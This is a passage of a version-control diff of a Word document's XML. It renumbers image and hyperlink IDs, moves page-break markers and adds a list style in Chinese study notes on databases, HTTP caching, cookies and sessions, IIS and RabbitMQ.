-                    <a:blip r:embed="rId13" cstate="print"/>
+                    <a:blip r:embed="rId14" cstate="print"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -14454,7 +14981,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14" cstate="print"/>
+                    <a:blip r:embed="rId15" cstate="print"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -14516,7 +15043,7 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
       </w:pPr>
-      <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:history="1">
+      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -14529,7 +15056,7 @@
       <w:r>
         <w:t>和</w:t>
       </w:r>
-      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
+      <w:hyperlink r:id="rId17" w:tgtFrame="_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -14565,7 +15092,7 @@
       <w:r>
         <w:t>维护的数据库软件。</w:t>
       </w:r>
-      <w:hyperlink r:id="rId17" w:tgtFrame="_blank" w:history="1">
+      <w:hyperlink r:id="rId18" w:tgtFrame="_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -14616,7 +15143,7 @@
       <w:r>
         <w:t>作为广泛使用的</w:t>
       </w:r>
-      <w:hyperlink r:id="rId18" w:tgtFrame="_blank" w:history="1">
+      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -14654,7 +15181,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>服务器操作系统</w:t>
       </w:r>
     </w:p>
@@ -14747,6 +15273,7 @@
         <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>OS X</w:t>
       </w:r>
     </w:p>
@@ -15482,7 +16009,6 @@
         <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Microsoft SQL Server 2014</w:t>
       </w:r>
       <w:r>
@@ -15663,6 +16189,7 @@
         </w:rPr>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t>总结</w:t>
       </w:r>
     </w:p>
@@ -16060,7 +16587,7 @@
         </w:rPr>
         <w:t xml:space="preserve">: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId19" w:anchor="atlas" w:history="1">
+      <w:hyperlink r:id="rId20" w:anchor="atlas" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -16595,7 +17122,6 @@
               <w:rPr>
                 <w:rFonts w:hint="eastAsia"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>Index</w:t>
             </w:r>
           </w:p>
@@ -16965,6 +17491,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>包含</w:t>
       </w:r>
       <w:r>
@@ -17969,7 +18496,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>改值</w:t>
       </w:r>
       <w:r>
@@ -19367,6 +19893,7 @@
           <w:b/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>分布式文件系统</w:t>
       </w:r>
     </w:p>
@@ -19614,7 +20141,7 @@
       <w:pPr>
         <w:widowControl/>
       </w:pPr>
-      <w:hyperlink r:id="rId20" w:history="1">
+      <w:hyperlink r:id="rId21" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -19925,7 +20452,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="3799205"/>
@@ -19942,7 +20468,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21" cstate="print"/>
+                    <a:blip r:embed="rId22" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -20061,6 +20587,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>{</w:t>
       </w:r>
     </w:p>
@@ -20547,7 +21074,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>$project</w:t>
       </w:r>
       <w:r>
@@ -20791,6 +21317,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="3013710" cy="5732780"/>
@@ -20809,7 +21336,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId22" cstate="print"/>
+                    <a:blip r:embed="rId23" cstate="print"/>
                     <a:srcRect/>
                     <a:stretch>
                       <a:fillRect/>
@@ -20921,7 +21448,6 @@
         <w:widowControl/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>{ "category": 1, "item": 1 }</w:t>
       </w:r>
     </w:p>
@@ -21131,6 +21657,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>.</w:t>
       </w:r>
     </w:p>
@@ -22317,7 +22844,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>单一职责原则</w:t>
       </w:r>
       <w:r>
@@ -22644,6 +23170,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>浏览器自身缓存技术</w:t>
       </w:r>
       <w:r>
@@ -23153,7 +23680,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23" cstate="print"/>
+                    <a:blip r:embed="rId24" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -23600,7 +24127,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">s-maxage: </w:t>
       </w:r>
       <w:r>
@@ -24294,7 +24820,18 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> + max-age/s-maxage </w:t>
+        <w:t xml:space="preserve"> + </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">max-age/s-maxage </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -24489,7 +25026,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24" cstate="print"/>
+                    <a:blip r:embed="rId25" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -24541,7 +25078,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId25" w:anchor="undefined" w:history="1">
+      <w:hyperlink r:id="rId26" w:anchor="undefined" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -24560,7 +25097,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId26" w:history="1">
+      <w:hyperlink r:id="rId27" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -24579,7 +25116,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId27" w:history="1">
+      <w:hyperlink r:id="rId28" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -24716,7 +25253,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>1</w:t>
       </w:r>
       <w:r>
@@ -25379,7 +25915,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId28" w:history="1">
+      <w:hyperlink r:id="rId29" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a5"/>
@@ -25404,7 +25940,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId29" w:history="1">
+      <w:hyperlink r:id="rId30" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -25493,6 +26029,7 @@
           <w:color w:val="70AD47" w:themeColor="accent6"/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Cookie</w:t>
       </w:r>
       <w:r>
@@ -25837,7 +26374,7 @@
           <w:szCs w:val="44"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId30" w:history="1">
+      <w:hyperlink r:id="rId31" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a5"/>
@@ -26158,7 +26695,7 @@
           <w:szCs w:val="22"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId31" w:history="1">
+      <w:hyperlink r:id="rId32" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -26247,7 +26784,6 @@
           <w:noProof/>
           <w:sz w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="114300" distR="114300">
             <wp:extent cx="5095240" cy="2761615"/>
@@ -26266,7 +26802,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId32" cstate="print"/>
+                    <a:blip r:embed="rId33" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -26308,6 +26844,7 @@
           <w:sz w:val="24"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>在这张图中，Web服务器中运行的Web应用程序就是我们所说的Application，每个客户端与Web服务器之间建立的连接就可以看做是一个Session。比如现在服务器端运行的是一个论坛系统，那么现在这个正运行在服务器端的论坛系统的软件就可以看做Application，而每个在线的用户与之建立的连接就相当于一个Session。</w:t>
       </w:r>
     </w:p>
@@ -26385,7 +26922,7 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId33" w:history="1">
+      <w:hyperlink r:id="rId34" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -26410,7 +26947,7 @@
           <w:sz w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId34" w:history="1">
+      <w:hyperlink r:id="rId35" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -26899,7 +27436,6 @@
           <w:szCs w:val="31"/>
           <w:shd w:val="clear" w:color="auto" w:fill="399AB2"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>软件架构</w:t>
       </w:r>
     </w:p>
@@ -27230,6 +27766,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Prism - Brian Lagunas</w:t>
       </w:r>
       <w:r>
@@ -28082,7 +28619,6 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>有IP确定服务器，请求到达这个地址（服务器）后，再由端口确定进程，由服务器对应的进程处理，在windows server服务器是由一个名为HTTP.SYS服务来接受http请求。</w:t>
       </w:r>
     </w:p>
@@ -28206,6 +28742,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>接下来解释下第4点中IIS是依据什么来处理请求的，答案就是请求文件的后缀名，能够处理各种后缀名的应用程序被叫做ISAPI（Internet Server Application Programe Interface，互联网服务器应用程序接口）应用程序，它其实是一个接口，扮演一个代理的角色，映射请求的页面的后缀和与之对应的应用程序。</w:t>
       </w:r>
     </w:p>
@@ -28397,7 +28934,6 @@
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="4905375" cy="3552825"/>
@@ -28414,7 +28950,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId35" cstate="print"/>
+                    <a:blip r:embed="rId36" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -28608,7 +29144,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5274310" cy="3905885"/>
@@ -28625,7 +29160,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId36" cstate="print"/>
+                    <a:blip r:embed="rId37" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -28699,7 +29234,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId37" cstate="print"/>
+                    <a:blip r:embed="rId38" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -28770,7 +29305,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId38" cstate="print"/>
+                    <a:blip r:embed="rId39" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -29715,7 +30250,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId39" w:history="1">
+      <w:hyperlink r:id="rId40" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -29773,7 +30308,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId40" w:history="1">
+      <w:hyperlink r:id="rId41" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -29834,7 +30369,7 @@
           <w:tab w:val="left" w:pos="3600"/>
         </w:tabs>
       </w:pPr>
-      <w:hyperlink r:id="rId41" w:history="1">
+      <w:hyperlink r:id="rId42" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -31510,7 +32045,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId42" cstate="print"/>
+                    <a:blip r:embed="rId43" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -31578,7 +32113,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId43" cstate="print"/>
+                    <a:blip r:embed="rId44" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -38860,7 +39395,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId44" cstate="print"/>
+                    <a:blip r:embed="rId45" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -38904,7 +39439,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId45" cstate="print"/>
+                    <a:blip r:embed="rId46" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -38988,7 +39523,7 @@
           <w:u w:val="none"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId46" w:history="1">
+      <w:hyperlink r:id="rId47" w:history="1">
         <w:r>
           <w:rPr>
             <w:color w:val="FF0000"/>
@@ -39054,7 +39589,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId47" cstate="print"/>
+                    <a:blip r:embed="rId48" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -39154,7 +39689,7 @@
           <w:color w:val="FF0000"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId48" w:history="1">
+      <w:hyperlink r:id="rId49" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -39222,7 +39757,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId49" cstate="print"/>
+                    <a:blip r:embed="rId50" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -39543,7 +40078,7 @@
         </w:rPr>
         <w:t>参考资料：</w:t>
       </w:r>
-      <w:hyperlink r:id="rId50" w:history="1">
+      <w:hyperlink r:id="rId51" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -41782,7 +42317,7 @@
         </w:rPr>
         <w:t>参考资料：</w:t>
       </w:r>
-      <w:hyperlink r:id="rId51" w:history="1">
+      <w:hyperlink r:id="rId52" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -41835,7 +42370,7 @@
         <w:tab/>
         <w:t xml:space="preserve">   </w:t>
       </w:r>
-      <w:hyperlink r:id="rId52" w:history="1">
+      <w:hyperlink r:id="rId53" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -42070,7 +42605,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId53" cstate="print"/>
+                    <a:blip r:embed="rId54" cstate="print"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -45046,7 +45581,7 @@
         </w:rPr>
         <w:t>3.帕斯卡(</w:t>
       </w:r>
-      <w:hyperlink r:id="rId54" w:tgtFrame="https://baike.baidu.com/item/%E5%B8%95%E6%96%AF%E5%8D%A1%E5%91%BD%E5%90%8D%E6%B3%95/_blank" w:history="1">
+      <w:hyperlink r:id="rId55" w:tgtFrame="https://baike.baidu.com/item/%E5%B8%95%E6%96%AF%E5%8D%A1%E5%91%BD%E5%90%8D%E6%B3%95/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -49066,7 +49601,7 @@
         </w:rPr>
         <w:t>，网址：</w:t>
       </w:r>
-      <w:hyperlink r:id="rId55" w:tgtFrame="_blank" w:tooltip="http://www.rabbitmq.com/" w:history="1">
+      <w:hyperlink r:id="rId56" w:tgtFrame="_blank" w:tooltip="http://www.rabbitmq.com/" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -50650,7 +51185,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId56" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
+      <w:hyperlink r:id="rId57" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -50866,7 +51401,7 @@
         </w:numPr>
         <w:ind w:left="450"/>
       </w:pPr>
-      <w:hyperlink r:id="rId57" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
+      <w:hyperlink r:id="rId58" w:tgtFrame="http://www.cnblogs.com/1996V/p/_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -51611,7 +52146,7 @@
         </w:rPr>
         <w:t>好了，访问</w:t>
       </w:r>
-      <w:hyperlink r:id="rId58" w:history="1">
+      <w:hyperlink r:id="rId59" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a6"/>
@@ -57053,6 +57588,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="35">
+    <w:nsid w:val="32081F37"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="5CB03E56"/>
+    <w:lvl w:ilvl="0" w:tplc="04090001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="420" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="36">
     <w:nsid w:val="3265AD81"/>
     <w:multiLevelType w:val="singleLevel"/>
     <w:tmpl w:val="3265AD81"/>
@@ -57068,7 +57716,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="36">
+  <w:abstractNum w:abstractNumId="37">
     <w:nsid w:val="3365A987"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="3365A987"/>
@@ -57217,7 +57865,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="37">
+  <w:abstractNum w:abstractNumId="38">
     <w:nsid w:val="347E74BA"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="347E74BA"/>
@@ -57366,7 +58014,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="38">
+  <w:abstractNum w:abstractNumId="39">
     <w:nsid w:val="34DAC83F"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="34DAC83F"/>
@@ -57515,7 +58163,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="39">
+  <w:abstractNum w:abstractNumId="40">
     <w:nsid w:val="35B5E4E7"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="35B5E4E7"/>
@@ -57664,7 +58312,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="40">
+  <w:abstractNum w:abstractNumId="41">
     <w:nsid w:val="377C9A98"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="377C9A98"/>
@@ -57813,7 +58461,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="41">
+  <w:abstractNum w:abstractNumId="42">
     <w:nsid w:val="38B460E2"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="38B460E2"/>
@@ -57962,7 +58610,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="42">
+  <w:abstractNum w:abstractNumId="43">
     <w:nsid w:val="3A160E5F"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1DCA388E"/>
@@ -58075,7 +58723,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="43">
+  <w:abstractNum w:abstractNumId="44">
     <w:nsid w:val="3BF24117"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="3BF24117"/>
@@ -58224,7 +58872,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="44">
+  <w:abstractNum w:abstractNumId="45">
     <w:nsid w:val="3FF5D49F"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="3FF5D49F"/>
@@ -58373,7 +59021,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="45">
+  <w:abstractNum w:abstractNumId="46">
     <w:nsid w:val="437C347A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="B142D010"/>
@@ -58486,7 +59134,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="46">
+  <w:abstractNum w:abstractNumId="47">
     <w:nsid w:val="4D52175F"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="818A2BD6"/>
@@ -58599,7 +59247,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="47">
+  <w:abstractNum w:abstractNumId="48">
     <w:nsid w:val="5231649A"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="675E1C70"/>
@@ -58748,7 +59396,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="48">
+  <w:abstractNum w:abstractNumId="49">
     <w:nsid w:val="5A4FAB1A"/>
     <w:multiLevelType w:val="multilevel"/>
